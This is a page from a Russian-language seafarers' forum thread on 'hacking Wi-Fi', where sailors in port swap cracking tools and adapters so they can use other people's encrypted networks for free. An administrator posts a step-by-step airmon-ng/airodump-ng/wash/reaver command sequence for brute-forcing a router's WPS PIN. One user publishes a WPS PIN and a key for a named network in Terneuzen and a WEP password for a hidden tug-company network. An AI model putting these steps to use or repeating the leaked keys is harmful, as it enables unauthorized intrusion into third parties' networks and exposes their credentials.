Translate

Форма входа

Логин:
Пароль:

Последнее резюме

[16.12.2021][Master]
LPG MASTER / LNG MASTER START (0)

Мини Чат

Top Buy

Модуль не активизирован (module is not installed)

Курс валют

Курсы валют в Украине

Google

В порту Одессы

powered by vesseltracker.com

Наш опрос

В каких крюингах Вы работаете!
Всего ответов: 1980

Статистика

PRCY.ru

Наша Кнопка





Моряки Одессы - Лучшие товары для моряков!
Четверг, 28.03.2024, 20:28        (048) 772-13-57          +38-067-172-75-42 
Приветствую Вас Новобранец | RSS
Главная | Регистрация | Вход
Взлом WI Fi - Страница 33 - МОРСКОЙ ФОРУМ


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
МОРСКОЙ ФОРУМ » Разное » Wi-Fi » Взлом WI Fi (Я как раз сейчас сижу с каюты в нете)
Взлом WI Fi
chibisДата: Пятница, 13.03.2009, 16:03 | Сообщение # 1
Группа: Удаленные





p.s.
Vipelectron:
Добрых времени суток! Я как раз сейчас сижу с каюты в нете, а судно на рейде Англии. А подключился я с помощью Linux OS BT3 к зашифрованной (WEP) точке!! Закрытые точки всегда мощнее , вы уже наверно знаете, разве плохо в рейсе скачивать гигабайты свежих фильмов. Про скайп я уже молчу.
Но поверьте мне, там нет волшебной "кнопки" само все взламываться не будет . Мой рекорд в нете примерно 98% портов в рейсе. Уже от нета просто тошнит, вот и хочу поделиться практикой. Для начала прочитайте ссылки, если вы еще не знаете азов, принципа защиты( взлома ) WI-FI! Я сам еще много не знаю, только первые шаги. И обязательно нужна хорошая направленная антенна, не обязательно заводская.У меня работает самодельная FA20, уступает только большим паробалическим.

хотелось бы развернуть эту тему по шире!!!

Адаптеры ALFA AWUS 036H 1W- NHR 2W можно купить здесь Зайти в Интернет магазин
Инструкции которые могут пригодится вам для ВАР-ВАР-ВИНГА
 
ovecoДата: Воскресенье, 24.05.2015, 20:46 | Сообщение # 641
Матрос 2кл.
Группа: Крюинг
Сообщений: 22
Смотрю морякам Одессы не до форума - как говорится не до жира, быть бы живым. И дай бог, чтобы все поменялось...
Но если будет время, на досуге посмотрите программку под названием Intercepter-NG.

 
VIP78Дата: Среда, 08.07.2015, 21:31 | Сообщение # 642
Карась
Группа: Пользователи
Сообщений: 8
Парни всем привет, залил WIFISLAX4-10-1 RU  прога бомба ломает WPA2   как орехи
 
VIP78Дата: Среда, 08.07.2015, 21:42 | Сообщение # 643
Карась
Группа: Пользователи
Сообщений: 8
WIFISLAX GEMINIS AUDITOR,Wifislax Metropolis, BrutusHack handshake, GOYscript. WPSpin generator. Linset   Всеми программками пользовался все ломаю. Кому интересно есть ролики по взлому  в YOU tube.  Последний порт Terneuszen  сетка (dian woning) WPS 41931127 KEY xp1s-1zse-j39d  Всем удачи smile
 
VIP78Дата: Пятница, 10.07.2015, 13:49 | Сообщение # 644
Карась
Группа: Пользователи
Сообщений: 8
Привет всем, снова на связи, тест WIFISLAX4.10.1 порт имменгем. Сетка скрытая WEP :Svitzer Tugs, пароль ААА111ВВВ2. всем удачи, пишите , если что подскажу.
 
VIP78Дата: Среда, 29.07.2015, 01:50 | Сообщение # 645
Карась
Группа: Пользователи
Сообщений: 8
всем привет, скажите у кого залит Pixiescript 2.6.3 на wifislax 4.10.1 скиньте ссылку на него спс
 
VIP78Дата: Четверг, 13.08.2015, 16:06 | Сообщение # 646
Карась
Группа: Пользователи
Сообщений: 8
Всем привет, бывалые взломщики подскажите у кого  на вооружении стоит алфа 036NHR v2?&& Стоит брать или остаться при своей 036Н, Жду ответа спс
 
BrabursДата: Четверг, 13.08.2015, 18:49 | Сообщение # 647
WiFi User
Группа: Друзья
Сообщений: 35
Цитата VIP78 ()
Всем привет, бывалые взломщики подскажите у кого на вооружении стоит алфа 036NHR v2?&& Стоит брать или остаться при своей 036Н, Жду ответа спс
Нормальный адаптер этот работает лучше чем V1 про первую версию много неготива в сети а это уже переработанная и улучшенная модель стоит брать если будете пользоваться N стандартом
 
VIP78Дата: Воскресенье, 23.08.2015, 20:50 | Сообщение # 648
Карась
Группа: Пользователи
Сообщений: 8
Braburs спс, а по поводу новых антен штыревых, что нового как они в работе 12db b 9db
 
voloДата: Четверг, 10.09.2015, 09:15 | Сообщение # 649
Юнга
Группа: Крюинг
Сообщений: 17
Добрый день,ребята надо ваша помощь,подскажите пожалуйста через какие программы сейчас лучше и быстрее взламывать wep шифрование?у кого нибудь удалось взломать wpa2?
 
chibisДата: Четверг, 10.09.2015, 09:57 | Сообщение # 650
Admin
Группа: Администраторы
Сообщений: 1044
Цитата volo ()
Добрый день,ребята надо ваша помощь,подскажите пожалуйста через какие программы сейчас лучше и быстрее взламывать wep шифрование?у кого нибудь удалось взломать wpa2?

Программа Beini для Wep
Программа BackTrack для Wpa
Эти программы хорошо зарекомендовали в боевых условиях.
 
voloДата: Четверг, 10.09.2015, 11:21 | Сообщение # 651
Юнга
Группа: Крюинг
Сообщений: 17
А можно инструкцию по взлому wpa? Kali не кто не юзает?
 
chibisДата: Четверг, 10.09.2015, 11:41 | Сообщение # 652
Admin
Группа: Администраторы
Сообщений: 1044
Цитата volo ()
А можно инструкцию по взлому wpa? Kali не кто не юзает?
Для Back Track после запуска программы открываем окно и пишем: Указанные ниже значения после каждого нажимаем ENTER

Airmon-ng

Airmon-ng start wlan0

Airodump-ng mon0

Wash -i mon0 (смотрим с NO выбираем с меньшим минусом)

ctrl+Z остановить сканирование

reaver -i mon0 -b (mac точки взлома) -vv --dh-small -d0 -c(номер канала жертвы) -l360(л 360 ставим в конце только тогда когда мы обнаруживаем что система тормозит)
 
STALKERДата: Пятница, 09.10.2015, 13:28 | Сообщение # 653
Советник по WiFi
Группа: Друзья
Сообщений: 110
Привет всем!!! Давненько не заходил, учёба,работа,семья,вообщем некогда было. По поводу Kali,
WPA теперь ломается за 10-20 мин. В кали подгружаем PIXIE DUST и о ля-ля...... вот ссылки, сам ещё не разбирался времени абсолютно нет, так что посмотрите видео, там все понятно,ребята уже опробовали говорят все работает, но как всегда не все роутеры способны так быстро ломаться.

https://www.youtube.com/watch?v=FiuKaXIaCNQ

https://www.youtube.com/watch?v=LCO1UdB1EKM

Может и мне кто поможет, подскажите где возьмут 3 помощником без опыта. Буду очень благодарен.
 
JonDoДата: Пятница, 09.10.2015, 14:20 | Сообщение # 654
Матрос 2кл.
Группа: Друзья
Сообщений: 24
Цитата STALKER ()
Привет всем!!! Давненько не заходил, учёба,работа,семья,вообщем некогда было. По поводу Kali,WPA теперь ломается за 10-20 мин. В кали подгружаем PIXIE DUST и о ля-ля...... вот ссылки, сам ещё не разбирался времени абсолютно нет, так что посмотрите видео, там все понятно,ребята уже опробовали говорят все работает, но как всегда не все роутеры способны так быстро ломаться.

https://www.youtube.com/watch?v=FiuKaXIaCNQ

https://www.youtube.com/watch?v=LCO1UdB1EKM

Может и мне кто поможет, подскажите где возьмут 3 помощником без опыта. Буду очень благодарен.

На каком адапторе пробовал и нету случайно пошагового набора в виде текста инструкции а то не видео не всё понятно я например через BackTrack уже не чего взломать не могу что постоянно блокирует набор пакетов, по поводу пойти в рейс 3-м помошником сейчас очень сложно ну из совета раньше брал Goldenport
 
STALKERДата: Пятница, 09.10.2015, 15:07 | Сообщение # 655
Советник по WiFi
Группа: Друзья
Сообщений: 110
К сожалению пошаговый нет, я как найду время сделаю инструкцию, но боюсь это будет не скоро.
 
STALKERДата: Пятница, 09.10.2015, 16:54 | Сообщение # 656
Советник по WiFi
Группа: Друзья
Сообщений: 110
Alfa UBDo-gt,чипсет Realtek 8187L такой же как в Alfa awus036H,12дБи,Мощность 1000mW
 
JonDoДата: Пятница, 09.10.2015, 17:04 | Сообщение # 657
Матрос 2кл.
Группа: Друзья
Сообщений: 24
Цитата STALKER ()
Alfa UBDo-gt,чипсет Realtek 8187L такой же как в Alfa awus036H,12дБи,Мощность 1000mW

Хороший чипсет жаль что скоро снимут с производства
 
stariusДата: Среда, 14.10.2015, 00:49 | Сообщение # 658
Wifi стажёр
Группа: Крюинг
Сообщений: 20

Цитата
Люди добрые напоминаю ещё раз, все МАНУАЛКИ НА БЕНЮ, ВТ-5 и ВИРТУАЛКУ,
КАЧАЕМ В СООБЩЕНИЯХ 61-63 ТАМ ЕСТЬ ССЫЛКИ НА
СКАЧИВАНИЕ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! СМОТРИТЕ И ЧИТАЙТЕ ФОРУМ
ВНИМАТЕЛЬНЕЕ, ВСЁ ДЛЯ ВАС ДЕЛАЕМ!!!!!!!!!!!!!


Доброго времени суток STALKER ! По указанным Вами ссылкам выдаёт сообщение о том, что страница не найдена.Мне, как начинающему пользователю хотелось бы получить помощь.Заранее спасибо.С Уважением Starius.


 
stariusДата: Среда, 14.10.2015, 01:05 | Сообщение # 659
Wifi стажёр
Группа: Крюинг
Сообщений: 20
Всем Доброго времени суток!
 
Помогите новичку! Стоим под арестом в Варне. Есть зашифрованные сети, а в базе,что раздаётся на сайте Болгарии вообще нет. Искусством взлома пока не овладел - в процессе. Может у кого есть ключики? Сейчас использую платный интернет. Но стоять по всей видимости долго. Поэтому хочется сэкономить. Заранее спасибо. Всем УДАЧИ!!!
 
stariusДата: Среда, 14.10.2015, 04:31 | Сообщение # 660
Wifi стажёр
Группа: Крюинг
Сообщений: 20
И снова Всем Доброго времени суток!
Вопрос о нерабочих ссылках снимается. В данный момент качаю. Вопрос по поводу сеток в Варне остаётся открытым. ОГРОМАДНЕЙШЕЕ СПАСИБО STALKERУ и CHIBISУ !!! Вы ребята,просто МОЛОДЦЫ!
В данный момент качаю программы и инструкции. После установки и тестов обязательно отпишусь.
Всем ЗДОРОВЬЯ и УДАЧИ !
 
МОРСКОЙ ФОРУМ » Разное » Wi-Fi » Взлом WI Fi (Я как раз сейчас сижу с каюты в нете)
Поиск:

                                   Найди Своё Судно
МОРЯКИ ОДЕССЫ © 2024